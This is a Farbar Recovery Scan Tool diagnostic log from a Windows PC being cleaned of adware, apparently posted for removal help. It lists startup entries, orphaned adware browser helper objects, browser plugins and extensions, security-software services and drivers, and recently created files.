HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-02-10] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [87336 2010-02-03] (CyberLink Corp.)
HKLM-x32\...\Run: [Hotkey Utility] => C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe [627304 2011-08-10] ()
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2013-11-02] (Apple Inc.)
HKLM-x32\...\Run: [IndexSearch] => C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe [46368 2010-03-09] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PaperPort PTD] => C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe [29984 2010-03-09] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PPort12reminder] => C:\Program Files (x86)\Nuance\PaperPort\Ereg\Ereg.exe [328992 2010-02-09] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe [636192 2010-03-05] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe [62752 2010-03-05] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [143360 2012-09-06] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.)
HKLM-x32\...\runonceex: [Flags] => 
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Corporation)
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [720064 2014-10-14] (Microsoft Corporation)
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Run: [Spotify Web Helper] => C:\Users\Bonnie\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1676344 2014-12-11] (Spotify Ltd)
HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Event Reminder.lnk
ShortcutTarget: Event Reminder.lnk -> C:\Program Files (x86)\The Print Shop 23.1\Remind.exe (Broderbund Properties LLC)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ImageBrowser EX Agent.lnk
ShortcutTarget: ImageBrowser EX Agent.lnk -> C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe ()
Startup: C:\Users\Bonnie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Admin\AppData\Roaming\Dropbox\bin\Dropbox.exe (No File)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Main,SearchMigratedDefaultURL = http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
HKU\S-1-5-21-2977827394-2594518940-965070511-1008\Software\Microsoft\Internet Explorer\Main,First Home Page = http://g.msn.com/1me10IE10ENUS/WOL_WCP
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1008 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = http://www.google.com/search?q={searchTerms}
BHO: caoupoNpEaK -> {01050D05-D546-B8DC-954D-8334A8A7BF5A} -> C:\ProgramData\caoupoNpEaK\_1Y.x64.dll No File
BHO: AudioCeonvaeert -> {2F344960-763E-9E6C-E973-25241A34D54E} -> C:\ProgramData\AudioCeonvaeert\mRE8_SdP.x64.dll No File
BHO: DiscounntLoCaatOr -> {39dd84e0-d7e2-4b5c-88df-6bfebdce6716} -> C:\ProgramData\DiscounntLoCaatOr\4hvGyEzAwMBtBM.x64.dll No File
BHO: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\ContentBlocker\ie_content_blocker_plugin.dll (Kaspersky Lab ZAO)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\OnlineBanking\online_banking_bho.dll (Kaspersky Lab ZAO)
BHO: SaoftiCoup -> {b2ba0648-6833-4057-aaa1-bf9c473dd360} -> C:\ProgramData\SaoftiCoup\HDwI4jNxyFjYaK.x64.dll No File
BHO: PrinCECCoupon -> {B4552D3D-6B41-9AF1-3067-72A066972344} -> C:\ProgramData\PrinCECCoupon\jsih.x64.dll No File
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: URL Advisor Plugin -> {E33CF602-D945-461A-83F0-819F76A199F8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)
BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Viewer Plus\Bin\PlusIEContextMenu.dll (Zeon Corporation)
BHO-x32: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\ContentBlocker\ie_content_blocker_plugin.dll (Kaspersky Lab ZAO)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\OnlineBanking\online_banking_bho.dll (Kaspersky Lab ZAO)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: URL Advisor Plugin -> {E33CF602-D945-461A-83F0-819F76A199F8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)
DPF: HKLM-x32 {E4D88471-7ED7-43E1-B290-205559E8EBB2} https://my.madisonhospital.org/mig/mae/login/Browser%20Logoff.dll
DPF: HKLM-x32 {ECB7BFF0-FF65-11D1-9004-00A0C92E6878} https://my.madisonhospital.org/mig/mae/login/MWebEnable.dll
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 10.10.10.254
Tcpip\..\Interfaces\{18BAEE32-7A7F-4151-B2E3-CD66400E704F}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{39C34F84-4F8F-431C-AA97-5BDA129281FC}: [NameServer] 8.8.8.8

FireFox:
========
FF ProfilePath: C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7xuz79o.default
FF NewTab: about:newtab
FF Homepage: about:home
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_16_0_0_257.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_257.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @canon.com/MycameraPlugin -> C:\Program Files (x86)\Canon\MyCamera Download Plugin\NPCIG.dll (CANON INC.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\1\NP_wtapp.dll ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2977827394-2594518940-965070511-1000: amazon.com/AmazonMP3DownloaderPlugin -> C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101752.dll (Amazon.com, Inc.)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml
FF HKLM-x32\...\Firefox\Extensions: [url_advisor@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com
FF Extension: Модуль перевірки посилань - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com [2014-11-24]
FF HKLM-x32\...\Firefox\Extensions: [virtual_keyboard@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com
FF Extension: Віртуальна клавіатура - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com [2014-11-24]
FF HKLM-x32\...\Firefox\Extensions: [content_blocker@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com
FF Extension: Модуль блокування небезпечних веб-сайтів - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com [2014-11-24]
FF HKLM-x32\...\Firefox\Extensions: [anti_banner@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\anti_banner@kaspersky.com
FF Extension: Chặn quảng cáo - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\anti_banner@kaspersky.com [2014-11-24]
FF HKLM-x32\...\Firefox\Extensions: [online_banking@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com
FF Extension: Безпечні платежі - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com [2014-11-24]

Chrome:
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR HKLM\...\Chrome\Extension: [blbkdnmdcafmfhinpmnlhhddbepgkeaa] - https://chrome.google.com/webstore/detail/blbkdnmdcafmfhinpmnlhhddbepgkeaa [Not Found]
CHR HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Chrome\Extension: [mgekkbflbjgdcmbphhpaikbmjbifkaib] - C:\Users\Bonnie\AppData\Local\CRE\mgekkbflbjgdcmbphhpaikbmjbifkaib.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [blbkdnmdcafmfhinpmnlhhddbepgkeaa] - https://chrome.google.com/webstore/detail/blbkdnmdcafmfhinpmnlhhddbepgkeaa [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [dchlnpcodkpfdpacogkljefecpegganj] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\urladvisor.crx [2013-10-08]
CHR HKLM-x32\...\Chrome\Extension: [hakdifolhalapjijoafobooafbilfakh] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\online_banking_chrome.crx [2013-10-08]
CHR HKLM-x32\...\Chrome\Extension: [hghkgaeecgjhjkannahfamoehjmkjail] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\content_blocker_chrome.crx [2013-10-08]
CHR HKLM-x32\...\Chrome\Extension: [jagncdcchgajhfhijbbhecadmaiegcmh] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\virtkbd.crx [2013-10-08]
CHR HKLM-x32\...\Chrome\Extension: [pjldcfjmnllhmgjclecdnfampinooman] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\ab.crx [2013-10-08]
CHR StartMenuInternet: Google Chrome - C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AVP; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe [214512 2013-10-08] (Kaspersky Lab ZAO)
R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [46904 2013-12-17] (Hewlett-Packard Company)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [144672 2010-03-09] (Nuance Communications, Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R0 kl1; C:\Windows\System32\DRIVERS\kl1.sys [458336 2014-11-25] (Kaspersky Lab ZAO)
S4 klflt; C:\Windows\System32\DRIVERS\klflt.sys [115296 2014-11-25] (Kaspersky Lab ZAO)
R1 KLIF; C:\Windows\System32\DRIVERS\klif.sys [625248 2014-11-25] (Kaspersky Lab ZAO)
R1 KLIM6; C:\Windows\System32\DRIVERS\klim6.sys [29792 2013-10-08] (Kaspersky Lab ZAO)
R3 klkbdflt; C:\Windows\System32\DRIVERS\klkbdflt.sys [29280 2014-11-25] (Kaspersky Lab ZAO)
R3 klmouflt; C:\Windows\System32\DRIVERS\klmouflt.sys [29280 2013-10-08] (Kaspersky Lab ZAO)
R1 klpd; C:\Windows\System32\DRIVERS\klpd.sys [15456 2013-04-12] (Kaspersky Lab ZAO)
R1 kltdi; C:\Windows\System32\DRIVERS\kltdi.sys [55904 2013-05-14] (Kaspersky Lab ZAO)
R1 kneps; C:\Windows\System32\DRIVERS\kneps.sys [178272 2014-11-25] (Kaspersky Lab ZAO)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [35064 2015-01-20] ()
S1 BHDrvx64; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\BASHDefs\20120711.002\BHDrvx64.sys [X]
S3 NAVENG; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\VirusDefs\20120727.033\ENG64.SYS [X]
S3 NAVEX15; \??\C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_19.0.0.128\Definitions\VirusDefs\20120727.033\EX64.SYS [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2015-01-23 18:12 - 2015-01-23 18:12 - 00021600 _____ () C:\Users\Admin\Desktop\FRST.txt
2015-01-22 20:55 - 2015-01-22 20:56 - 00000000 ____D () C:\Users\Admin\Desktop\NPP
2015-01-22 20:48 - 2015-01-22 20:48 - 00379899 _____ () C:\Users\Admin\Desktop\notepad2_4.2.25_x64.zip
2015-01-22 20:20 - 2015-01-22 20:20 - 00000297 _____ () C:\files.log
2015-01-22 20:20 - 2015-01-22 19:58 - 00024064 _____ () C:\Windows\zoek-delete.exe
2015-01-22 20:12 - 2015-01-22 20:20 - 00000079 _____ () C:\folders.log
2015-01-22 20:12 - 2015-01-22 20:20 - 00000000 ____D () C:\zoek
2015-01-22 19:59 - 2015-01-22 20:20 - 00051361 _____ () C:\zoek-results.log
2015-01-22 19:58 - 2015-01-22 20:17 - 00000000 ____D () C:\zoek_backup
2015-01-22 19:09 - 2015-01-22 19:09 - 00000000 ____D () C:\Windows\ERUNT
2015-01-21 23:59 - 2015-01-23 18:10 - 00000000 ____D () C:\Users\Admin\Desktop\SpywareHammerArchivedTools
2015-01-21 23:27 - 2015-01-21 23:31 - 00000000 ____D () C:\AdwCleaner
2015-01-21 22:29 - 2015-01-21 22:29 - 00000000 ____D () C:\Users\Admin\AppData\Roaming\Mozilla
2015-01-21 22:29 - 2015-01-21 22:29 - 00000000 ____D () C:\Users\Admin\AppData\Roaming\ATI
2015-01-21 22:29 - 2015-01-21 22:29 - 00000000 ____D () C:\Users\Admin\AppData\Local\Mozilla
2015-01-21 22:29 - 2015-01-21 22:29 - 00000000 ____D () C:\Users\Admin\AppData\Local\ATI
2015-01-21 22:28 - 2015-01-21 22:28 - 00438944 _____ () C:\Users\Admin\AppData\Local\GDIPFONTCACHEV1.DAT
2015-01-21 22:28 - 2015-01-21 22:28 - 00001420 _____ () C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-01-21 22:28 - 2015-01-21 22:28 - 00000000 ____D () C:\Users\Admin\AppData\Roaming\OEM
2015-01-21 22:28 - 2015-01-21 22:28 - 00000000 ____D () C:\Users\Admin\AppData\Roaming\ControlCenter4
2015-01-21 22:28 - 2015-01-21 22:28 - 00000000 ____D () C:\Users\Admin\AppData\Roaming\Apple Computer
2015-01-21 22:14 - 2015-01-21 22:14 - 00000000 ____D () C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirusTotal Uploader 2.2
2015-01-21 22:14 - 2015-01-21 22:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VirusTotal Uploader 2.2
2015-01-21 22:14 - 2015-01-21 22:14 - 00000000 ____D () C:\Program Files (x86)\VirusTotalUploader2
2015-01-20 23:32 - 2015-01-20 23:32 - 00000000 __SHD () C:\Users\Admin\AppData\Local\EmieUserList
2015-01-20 23:32 - 2015-01-20 23:32 - 00000000 __SHD () C:\Users\Admin\AppData\Local\EmieSiteList
2015-01-20 23:32 - 2015-01-20 23:32 - 00000000 __SHD () C:\Users\Admin\AppData\Local\EmieBrowserModeList
2015-01-20 23:32 - 2015-01-20 23:32 - 00000000 ____D () C:\Users\Admin\AppData\Roaming\Adobe
2015-01-20 23:30 - 2015-01-20 23:30 - 00035064 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2015-01-20 23:30 - 2015-01-20 23:30 - 00000000 ____D () C:\ProgramData\RogueKiller
2015-01-20 23:21 - 2015-01-23 18:12 - 00000000 ____D () C:\FRST
2015-01-20 22:29 - 2015-01-20 22:29 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2015-01-20 21:50 - 2015-01-20 21:50 - 02126848 _____ (Farbar) C:\Users\Admin\Desktop\FRST64.exe
2015-01-19 11:14 - 2015-01-19 11:14 - 00000000 ____D () C:\Windows\ERDNT
2015-01-19 11:13 - 2015-01-19 11:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ERUNT
2015-01-19 11:13 - 2015-01-19 11:13 - 00000000 ____D () C:\Program Files (x86)\ERUNT
2015-01-16 21:21 - 2015-01-21 22:28 - 00000000 ____D () C:\Users\Admin
2015-01-16 21:21 - 2015-01-16 21:21 - 00000020 ___SH () C:\Users\Admin\ntuser.ini
2015-01-16 21:21 - 2012-06-01 02:04 - 00000000 ____D () C:\Users\Admin\AppData\Local\Microsoft Help
2015-01-16 21:21 - 2012-05-29 04:19 - 00000000 ____D () C:\Users\Admin\AppData\Roaming\Macromedia
2015-01-16 21:21 - 2009-07-13 21:54 - 00000000 ___RD () C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-01-16 21:21 - 2009-07-13 21:49 - 00000000 ___RD () C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-01-14 23:48 - 2015-01-14 23:49 - 517151106 _____ () C:\Users\Bonnie\Documents\registryBackup_1-14-15.reg
2015-01-14 22:38 - 2014-12-18 20:06 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2015-01-14 22:38 - 2014-12-18 18:46 - 00141312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2015-01-14 22:38 - 2014-12-11 22:35 - 05553592 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-01-14 22:38 - 2014-12-11 22:31 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2015-01-14 22:38 - 2014-12-11 22:31 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2015-01-14 22:38 - 2014-12-11 22:31 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2015-01-14 22:38 - 2014-12-11 22:11 - 03971512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2015-01-14 22:38 - 2014-12-11 22:11 - 03916728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2015-01-14 22:38 - 2014-12-11 22:07 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2015-01-14 22:38 - 2014-12-11 10:47 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\TSWbPrxy.exe
2015-01-14 22:38 - 2014-12-05 21:17 - 00303616 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll
2015-01-14 22:38 - 2014-12-05 20:50 - 00156672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncsi.dll
2015-01-14 22:38 - 2014-12-05 20:50 - 00052224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlaapi.dll
2015-01-14 22:38 - 2014-08-28 19:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2015-01-14 22:38 - 2014-05-08 02:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\RdpGroupPolicyExtension.dll
2015-01-14 22:37 - 2014-09-04 19:11 - 06584320 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2015-01-14 22:37 - 2014-09-04 18:52 - 05703168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2015-01-13 07:53 - 2013-10-01 19:22 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\TsUsbFlt.sys
2015-01-13 07:53 - 2013-10-01 19:11 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyControl.exe
2015-01-13 07:53 - 2013-10-01 19:08 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbRedirectionGroupPolicyExtension.dll
2015-01-13 07:53 - 2013-10-01 18:29 - 00062976 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2015-01-13 07:53 - 2013-10-01 18:10 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\TsUsbGDCoInstaller.dll
2015-01-13 07:53 - 2013-10-01 16:58 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2015-01-13 07:52 - 2013-10-01 18:48 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\MsRdpWebAccess.dll
2015-01-13 07:52 - 2013-10-01 18:48 - 00018944 _____ (Microsoft Corporation) C:\Windows\system32\wksprtPS.dll
2015-01-13 07:52 - 2013-10-01 17:15 - 01057280 _____ (Microsoft Corporation) C:\Windows\system32\rdvidcrl.dll
2015-01-13 07:52 - 2013-10-01 17:14 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MsRdpWebAccess.dll
2015-01-13 07:52 - 2013-10-01 17:14 - 00017920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wksprtPS.dll
2015-01-13 07:52 - 2013-10-01 17:01 - 00420864 _____ (Microsoft Corporation) C:\Windows\system32\wksprt.exe
2015-01-13 07:52 - 2013-10-01 16:31 - 01147392 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2015-01-13 07:52 - 2013-10-01 16:08 - 00855552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdvidcrl.dll
2015-01-13 07:52 - 2013-10-01 15:34 - 01068544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2015-01-13 07:51 - 2012-08-23 07:13 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2015-01-13 07:51 - 2012-08-23 07:10 - 00019456 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpvideominiport.sys
